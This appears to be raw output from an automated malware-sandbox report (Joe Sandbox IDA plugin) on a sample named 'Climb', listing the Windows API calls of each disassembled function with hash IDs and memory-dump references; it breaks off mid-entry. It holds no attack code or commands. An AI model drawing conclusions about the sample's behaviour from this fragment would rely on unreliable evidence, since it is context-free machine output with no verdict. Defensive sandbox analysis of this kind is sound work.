                                                                                                                                                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                                                      • API String ID: 4137639002-1221869570
                                                                                                                                                                      • Opcode ID: cdbeaace7d871e62aecd8adfa6dd62c293d9aa10f1bc03eaa549b3ba2e9a7692
                                                                                                                                                                      • Instruction ID: 35bcda13971537a4c46b19a48494b75d321c357dbad2c48ae4afbdabf953da02
                                                                                                                                                                      • Opcode Fuzzy Hash: cdbeaace7d871e62aecd8adfa6dd62c293d9aa10f1bc03eaa549b3ba2e9a7692
                                                                                                                                                                      • Instruction Fuzzy Hash: 649134746083069FCB00EF24D48496ABBE5BF89714F14892EF8899B351DB31ED05DF92
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 005508FE: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00550831,80070057,?,?,?,00550C4E), ref: 0055091B
                                                                                                                                                                        • Part of subcall function 005508FE: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00550831,80070057,?,?), ref: 00550936
                                                                                                                                                                        • Part of subcall function 005508FE: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00550831,80070057,?,?), ref: 00550944
                                                                                                                                                                        • Part of subcall function 005508FE: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00550831,80070057,?), ref: 00550954
                                                                                                                                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 005756AE
                                                                                                                                                                      • _wcslen.LIBCMT ref: 005757B6
                                                                                                                                                                      • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0057582C
                                                                                                                                                                      • CoTaskMemFree.OLE32(?), ref: 00575837
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                                                                                                      • String ID: NULL Pointer assignment
                                                                                                                                                                      • API String ID: 614568839-2785691316
                                                                                                                                                                      • Opcode ID: f82ceabc6b0e2f077422d9d07a265c231ebb43b8f9b45aa6faafaef3105ad52f
                                                                                                                                                                      • Instruction ID: 9699ca8f46b42262974a744c4f4b61df4242bfc6f7a6782d7ab05fa63cff4416
                                                                                                                                                                      • Opcode Fuzzy Hash: f82ceabc6b0e2f077422d9d07a265c231ebb43b8f9b45aa6faafaef3105ad52f
                                                                                                                                                                      • Instruction Fuzzy Hash: 2A910771D0021DAFDF14DFA4D881AEDBBB8FF08304F10856AE919A7291EB745A44DFA1
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetMenu.USER32(?), ref: 00582C1F
                                                                                                                                                                      • GetMenuItemCount.USER32(00000000), ref: 00582C51
                                                                                                                                                                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00582C79
                                                                                                                                                                      • _wcslen.LIBCMT ref: 00582CAF
                                                                                                                                                                      • GetMenuItemID.USER32(?,?), ref: 00582CE9
                                                                                                                                                                      • GetSubMenu.USER32(?,?), ref: 00582CF7
                                                                                                                                                                        • Part of subcall function 00554393: GetWindowThreadProcessId.USER32(?,00000000), ref: 005543AD
                                                                                                                                                                        • Part of subcall function 00554393: GetCurrentThreadId.KERNEL32 ref: 005543B4
                                                                                                                                                                        • Part of subcall function 00554393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00552F00), ref: 005543BB
                                                                                                                                                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00582D7F
                                                                                                                                                                        • Part of subcall function 0055F292: Sleep.KERNEL32 ref: 0055F30A
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4196846111-0
                                                                                                                                                                      • Opcode ID: 1dc8cbbe534ae9522705293728d59bf9538c8cc3207de50ad5e87cf32f98af5d
                                                                                                                                                                      • Instruction ID: c9c38a4d559603e53542d989a7d81f35d05d91e2ca1b00e38b5f160bcd430ae2
                                                                                                                                                                      • Opcode Fuzzy Hash: 1dc8cbbe534ae9522705293728d59bf9538c8cc3207de50ad5e87cf32f98af5d
                                                                                                                                                                      • Instruction Fuzzy Hash: 9C715E75A00209AFCB10EF65C845AAEBFF5FF88314F148859E916FB251DB74AD42CB90
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetParent.USER32(?), ref: 0055B8C0
                                                                                                                                                                      • GetKeyboardState.USER32(?), ref: 0055B8D5
                                                                                                                                                                      • SetKeyboardState.USER32(?), ref: 0055B936
                                                                                                                                                                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 0055B964
                                                                                                                                                                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 0055B983
                                                                                                                                                                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 0055B9C4
                                                                                                                                                                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 0055B9E7
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 87235514-0
                                                                                                                                                                      • Opcode ID: 50be03bacc5368a209c74c504c75047897c50a83486635bd0078ca4c390a1c50
                                                                                                                                                                      • Instruction ID: 659f9d5bfd45355ff9d1b10fb31dac98a85657e791785b925eb9f12886e072c6
                                                                                                                                                                      • Opcode Fuzzy Hash: 50be03bacc5368a209c74c504c75047897c50a83486635bd0078ca4c390a1c50
                                                                                                                                                                      • Instruction Fuzzy Hash: 8D51F3A09087D53EFB324634CC6EBB6BEA97B06305F08848AE9D5558D2C3D8ACCCD750
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetParent.USER32(00000000), ref: 0055B6E0
                                                                                                                                                                      • GetKeyboardState.USER32(?), ref: 0055B6F5
                                                                                                                                                                      • SetKeyboardState.USER32(?), ref: 0055B756
                                                                                                                                                                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0055B782
                                                                                                                                                                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0055B79F
                                                                                                                                                                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0055B7DE
                                                                                                                                                                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0055B7FF
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 87235514-0
                                                                                                                                                                      • Opcode ID: 6d807a4df3fce815a26db2ec8f500bc73146459b3a4fdd4402569781f84bca0c
                                                                                                                                                                      • Instruction ID: bfb89f210bfd74dbadff3f635c2bdfb86243e558cec877f2fa8ae224c3d477ac
                                                                                                                                                                      • Opcode Fuzzy Hash: 6d807a4df3fce815a26db2ec8f500bc73146459b3a4fdd4402569781f84bca0c
                                                                                                                                                                      • Instruction Fuzzy Hash: F651F6A09147D53EFB3283348C79B76BEA8BB45305F0C848AE8D5568D2D395EC8CD751
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00525F16,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 005257E3
                                                                                                                                                                      • __fassign.LIBCMT ref: 0052585E
                                                                                                                                                                      • __fassign.LIBCMT ref: 00525879
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0052589F
                                                                                                                                                                      • WriteFile.KERNEL32(?,FF8BC35D,00000000,00525F16,00000000,?,?,?,?,?,?,?,?,?,00525F16,?), ref: 005258BE
                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000001,00525F16,00000000,?,?,?,?,?,?,?,?,?,00525F16,?), ref: 005258F7
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1324828854-0
                                                                                                                                                                      • Opcode ID: adc4f732bddba57e1d491ecd92388bc30b8f5632f2540c0941d930bdc4ac21ac
                                                                                                                                                                      • Instruction ID: b04b5b41ed7b8d0a2b44eb5a6e04ea9a7c0fa27428304ad67994358c06d413dd
                                                                                                                                                                      • Opcode Fuzzy Hash: adc4f732bddba57e1d491ecd92388bc30b8f5632f2540c0941d930bdc4ac21ac
                                                                                                                                                                      • Instruction Fuzzy Hash: 5B51AF70A006599FCB11CFA8E885AEEBBF8FF1A310F14451AE951F7291E7309981CF60
                                                                                                                                                                      APIs
                                                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 005130BB
                                                                                                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 005130C3
                                                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00513151
                                                                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 0051317C
                                                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 005131D1
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                      • String ID: csm
                                                                                                                                                                      • API String ID: 1170836740-1018135373
                                                                                                                                                                      • Opcode ID: c81a499ae36034eac19a85e9de8dd82a7b86804971dad7e8061e36e68169786b
                                                                                                                                                                      • Instruction ID: 4bd97369d7d5128b16ec4c7ae5fadb702ec2dd2de6223e3794775517c4910a85
                                                                                                                                                                      • Opcode Fuzzy Hash: c81a499ae36034eac19a85e9de8dd82a7b86804971dad7e8061e36e68169786b
                                                                                                                                                                      • Instruction Fuzzy Hash: B941D334A0021AABDF10DF68C8A9ADEBFB5BF45324F148555E814AB392D731DF85CB90
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0055E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0055D7CD,?), ref: 0055E714
                                                                                                                                                                        • Part of subcall function 0055E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0055D7CD,?), ref: 0055E72D
                                                                                                                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 0055D7F0
                                                                                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 0055D82A
                                                                                                                                                                      • _wcslen.LIBCMT ref: 0055D8B0
                                                                                                                                                                      • _wcslen.LIBCMT ref: 0055D8C6
                                                                                                                                                                      • SHFileOperationW.SHELL32(?), ref: 0055D90C
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                                                                                                      • String ID: \*.*
                                                                                                                                                                      • API String ID: 3164238972-1173974218
                                                                                                                                                                      • Opcode ID: 6853b663e28371bbe9715b2d4d860d3184efbcf92d4c05da0fc2246e7d4208f2
                                                                                                                                                                      • Instruction ID: 36f6910db8444a9cd5f57c3e5bf3e719a3d56a0a9655058a5f54c3888d9feb13
                                                                                                                                                                      • Opcode Fuzzy Hash: 6853b663e28371bbe9715b2d4d860d3184efbcf92d4c05da0fc2246e7d4208f2
                                                                                                                                                                      • Instruction Fuzzy Hash: 8D4189728052199EDF12EFA4C996ADD7BB8BF48381F0004EBA905E7141EB34A78CCF50
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetInputState.USER32 ref: 00564310
                                                                                                                                                                      • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00564367
                                                                                                                                                                      • TranslateMessage.USER32(?), ref: 00564390
                                                                                                                                                                      • DispatchMessageW.USER32(?), ref: 0056439A
                                                                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 005643AB
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                                                                                                      • String ID: (\
                                                                                                                                                                      • API String ID: 2256411358-3685820393
                                                                                                                                                                      • Opcode ID: 9367f4426549cf0fece53992234bd02d5b81abcfd8f8cf22e8277c1005cf53fd
                                                                                                                                                                      • Instruction ID: 608b13137c67d936e597d437f92833dcd81e7aeb087e2d84c9d3f8b7391dc7c8
                                                                                                                                                                      • Opcode Fuzzy Hash: 9367f4426549cf0fece53992234bd02d5b81abcfd8f8cf22e8277c1005cf53fd
                                                                                                                                                                      • Instruction Fuzzy Hash: 4B319E70604646DEEB349B64D849FB63FA8BB21305F144D69E4A2832A0E7B498C9DF25
                                                                                                                                                                      APIs
                                                                                                                                                                      • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 005838B8
                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 005838EB
                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00583920
                                                                                                                                                                      • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00583952
                                                                                                                                                                      • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 0058397C
                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0058398D
                                                                                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 005839A7
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: LongWindow$MessageSend
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2178440468-0
                                                                                                                                                                      • Opcode ID: 51f63bb0e700147efb2a8868d464eb06cb8f3400e17cb44ee0928b2ed0ea77b6
                                                                                                                                                                      • Instruction ID: b06cada52b2509999a4a5a1d9ddec3b7981d934f35ceea2925cd37309bb88f9a
                                                                                                                                                                      • Opcode Fuzzy Hash: 51f63bb0e700147efb2a8868d464eb06cb8f3400e17cb44ee0928b2ed0ea77b6
                                                                                                                                                                      • Instruction Fuzzy Hash: DE313730705255AFDB21EF49DC85F643BE5FB96B10F1411A4F910EB2B2CBB0A988EB11
                                                                                                                                                                      APIs
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 005580D0
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 005580F6
                                                                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 005580F9
                                                                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 00558117
                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 00558120
                                                                                                                                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 00558145
                                                                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 00558153
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3761583154-0
                                                                                                                                                                      • Opcode ID: c8cdccdba6900b87f5c9b4b3475db508c17d2f3b9873d574295010842fd89e8d
                                                                                                                                                                      • Instruction ID: ff126620af807dc465f387b7392d304618f976eaad7cfdaf66646478a0afa95d
                                                                                                                                                                      • Opcode Fuzzy Hash: c8cdccdba6900b87f5c9b4b3475db508c17d2f3b9873d574295010842fd89e8d
                                                                                                                                                                      • Instruction Fuzzy Hash: 1C218872600519AF9F10DFA8DC88CBA77ECFB093617048416FD05EB2A0DA70DC4ACB60
                                                                                                                                                                      APIs
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 005581A9
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 005581CF
                                                                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 005581D2
                                                                                                                                                                      • SysAllocString.OLEAUT32 ref: 005581F3
                                                                                                                                                                      • SysFreeString.OLEAUT32 ref: 005581FC
                                                                                                                                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 00558216
                                                                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 00558224
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3761583154-0
                                                                                                                                                                      • Opcode ID: 525fb05ab564b240f2f4d4e0e9f31d12709451357367cdfba7a03fbf22de45db
                                                                                                                                                                      • Instruction ID: 810e399088ed221972771044f9e75603b1075b09596497bdd6ce07d4b188dc61
                                                                                                                                                                      • Opcode Fuzzy Hash: 525fb05ab564b240f2f4d4e0e9f31d12709451357367cdfba7a03fbf22de45db
                                                                                                                                                                      • Instruction Fuzzy Hash: 71217475600504BF9F109BA8DC89DBA7BECFB09361B048126FD05EB2A0DA74EC45DB64
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetStdHandle.KERNEL32(0000000C), ref: 00560E99
                                                                                                                                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00560ED5
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateHandlePipe
                                                                                                                                                                      • String ID: nul
                                                                                                                                                                      • API String ID: 1424370930-2873401336
                                                                                                                                                                      • Opcode ID: aa282a27fc6beabb81e7f8e4fd924a6ec382299d72d21fa56d082e995e7b3e80
                                                                                                                                                                      • Instruction ID: 30d997f495fa3e13a6daf92a15bb91fc84bcb4dffef8b4187a20f644be4013c3
                                                                                                                                                                      • Opcode Fuzzy Hash: aa282a27fc6beabb81e7f8e4fd924a6ec382299d72d21fa56d082e995e7b3e80
                                                                                                                                                                      • Instruction Fuzzy Hash: AA216B7450030AABDB308F28DC04A9BBBF8BF54720F205A59FCA5E72D0D771A844DB60
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00560F6D
                                                                                                                                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00560FA8
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
